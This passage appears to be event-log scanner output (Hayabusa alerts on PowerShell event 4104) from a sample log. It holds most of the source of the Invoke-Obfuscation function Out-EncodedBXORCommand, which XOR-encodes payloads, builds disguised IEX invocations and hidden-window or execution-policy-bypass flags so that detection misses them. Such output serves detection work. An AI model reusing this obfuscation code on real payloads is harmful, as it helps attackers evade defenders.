""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 